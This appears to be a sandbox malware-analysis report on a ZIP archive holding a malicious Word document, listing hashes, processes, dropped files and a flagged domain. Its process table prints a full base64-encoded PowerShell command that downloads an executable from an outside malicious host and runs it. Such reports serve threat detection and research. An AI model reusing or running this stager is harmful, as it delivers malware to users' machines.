Property | Value |
---|---|
File name | Casasantachiara.zip |
Full analysis | https://app.any.run/tasks/782fe032-b7fa-4071-8dd8-a8e4981655d3 |
Verdict | Malicious activity |
Analysis date | June 19, 2019, 08:17:14 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | application/zip |
File info | Zip archive data, at least v2.0 to extract |
MD5 | CD92571CA4C4C664152FF74112FE77E5 |
SHA1 | 12DA6C89B461C738BCAE442350ABAEAAFB23880A |
SHA256 | 4213DC430165E06BD8458CAA1601B684680BA3335012CF7A86034B309612C2B6 |
SSDEEP | 768:10rD6P5E+UPzqDOArZ3IML6s2d1FIZ86vPg23yAM52z8gQ8+iRbuFxnxT3cuPyN4:arD6YrqD9rXL6s2d1F80AM52wiuFxnx7 |

Extension | File type |
---|---|
.zip | ZIP compressed archive (100) |

Field | Value |
---|---|
ZipRequiredVersion | 20 |
ZipBitFlag | 0x0009 |
ZipCompression | Deflated |
ZipModifyDate | 2019:06:18 06:02:07 |
ZipCRC | 0x6b071cb8 |
ZipCompressedSize | 48819 |
ZipUncompressedSize | 77312 |
ZipFileName | info_18.06.doc |

PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1740 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Casasantachiara.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 | | | | |
3708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb1740.34583\info_18.06.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | | |
1364 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exec Bypass -enc JABpAFYAbwA4ADcAQgB1ACAAPQAgACcATAB2AEgATABLAHIAJwA7ACQARwBjAE8AVQBUAGEARgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAaQBWAG8AOAA3AEIAdQArACcALgBlAHgAZQAnADsAJABvADQAZgA5AFUAZAA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAGAAVABgAC4AdwBlAGIAYABDAEwAaQBlAE4AVAA7ACQAdgB1AFIARABPAEEAegBDAD0AJwBoAHQAdABwADoALwAvAG0ANgAxADQANwBrAGUAZQBnAGEAbgBwAHcALgBpAG4AZgBvAC8AcwBwADIAOAAyAHkALwBzAGkAMgBzADgAMQAtADEAOQAuAHAAaABwAD8AbAA9AHIAdwBvAHEAMQAuAGQAYQB0ACcALgBzAHAAbABpAHQAKAAnACUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQASQBQAHAAbQA0AE4AaQBXACAAaQBuACAAJAB2AHUAUgBEAE8AQQB6AEMAKQB7AHQAcgB5AHsAJABvADQAZgA5AFUAZAAuAEQAbwB3AE4AbABvAGEARABmAEkAbABFACgAJABJAFAAcABtADQATgBpAFcALAAgACQARwBjAE8AVQBUAGEARgApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEcAYwBPAFUAVABhAEYAKQAuAGwARQBOAEcAdABoACAALQBnAGUAIAB7AG4AdQBtAGIAZQByADEAfQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwBUAGEAUgB0ACgAJABHAGMATwBVAFQAYQBGACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9AA0ACgA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC35E.tmp.cvr | — | — | — |
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LLB72WMIJOTHHXCKM7JF.temp | — | — | — |
1740 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb1740.34583\info_18.06.doc | document | F5B5F4B4799C3B6E3EA1E48DBC55209A | 75D08136A8E3034288185D0A453773F43019D7FF792435AF42147280FD632AA8 |
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14d04e.TMP | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 209705D762BD9B55D1D0E296E772B2E9 | E8A0E5E39B555E7FC04F6ACFCDB7438145D3E3FADC0453ED658BA79DBAF322C4 |
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb1740.34583\~$fo_18.06.doc | pgc | 184EF813E87C3DB89D4A1A59BFCECCDC | 2D0C29CA9AC1C72D529E9DEB09E765618890F4D2555C1E8350CD795FAB6B86AA |
1364 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 72137955DCA8C75389D71BDA66027B75 | 9FDCF443E2095FA1555C259FD1A9FB564823FF6825642855AC7AC4391CE16A3D |

Domain | IP | Reputation |
---|---|---|
m6147keeganpw.info | | malicious |
dns.msftncsi.com | | shared |